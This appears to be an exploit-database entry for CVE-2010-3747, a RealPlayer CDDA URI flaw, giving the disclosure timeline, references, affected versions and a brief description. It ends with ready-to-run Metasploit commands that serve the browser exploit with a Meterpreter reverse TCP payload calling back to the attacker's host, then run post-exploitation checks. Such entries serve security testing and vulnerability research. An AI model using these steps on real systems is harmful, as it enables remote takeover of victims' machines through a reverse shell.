CVE-2010-3747 : RealNetworks RealPlayer CDDA URI Initialization Vulnerability

Timeline :

Vulnerability discovered by CHkr_D591
Vulnerability transmitted to ZDI by CHkr_D591
Vulnerability reported to the vendor by ZDI on 2009-11-24
Coordinated public release of advisory on 2010-10-15
Saint PoC provided on 2010-10-22
Metasploit PoC provided on 2011-03-17

PoC provided by :

bannedit
sinn3r

Reference(s) :

CVE-2010-3747
ZDI-10-210
OSVDB-68673
RealNetworks

Affected version(s) :

RealPlayer 11 to 11.1
RealPlayer SP 1.0 to 1.1.4

Tested on Windows XP SP3 with :

RealPlayer SP 1.1
IE 6.0.2900.5512

Description :

This module exploits an initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 – 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory is executed.

Commands :

use exploit/windows/browser/realplayer_cdda_uri
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid